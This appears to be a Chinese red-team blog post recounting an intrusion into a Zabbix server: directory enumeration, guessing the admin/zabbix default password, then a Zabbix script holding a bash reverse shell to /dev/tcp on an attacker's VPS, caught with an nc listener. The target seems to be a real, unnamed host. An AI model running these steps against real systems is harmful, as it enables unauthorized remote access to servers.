
saulGoodman
一个专注于红队攻防研究的公众号
关注
Zabbix-弱口令再到命令执行Getshell
信息搜集
先是枚举了一下目录:

得到了一些可利用的文件:
代码语言:javascript复制[06:13:52] 200 - 86KB - /phpinfo.php
[06:13:56] 200 - 2KB - /setup.php
[06:14:01] 200 - 2KB - /users.phpphpinfo中可以得到一些信息:用的是Linux操作系统:

通过DOCUMENT_ROOT函数得知网站的绝对路径是/opt/httpd-2.4.29/htdocs:

接着来到:http://xx.xx.xx.xx/setup.php,是一个安装页面,不管他。要是我重新给他安装了web,我估计第二天就能去警察叔叔那里喝茶谈人生了

第三个页面是:http://xx.xx.xx.xx/users.php:

弱口令
掏出我的BurpSuite 大字典集合得到账号密码为:admin / zabbix 进入到了后台:

Getshell
在管理-脚本-创建脚本写入反弹shell命令:
bash -i >& /dev/tcp/VPS的IP/6666 0>&1
在监测-问题处打开一个主机,然后找到刚刚创建的脚本power-liu:

这个时候我们的 VPS 用 nc 监听 :
代码语言:javascript复制nc -lvp 6666
即可成功反弹一枚 shell!

由于网络安全法的原因,我没深入!点到为止就好了!







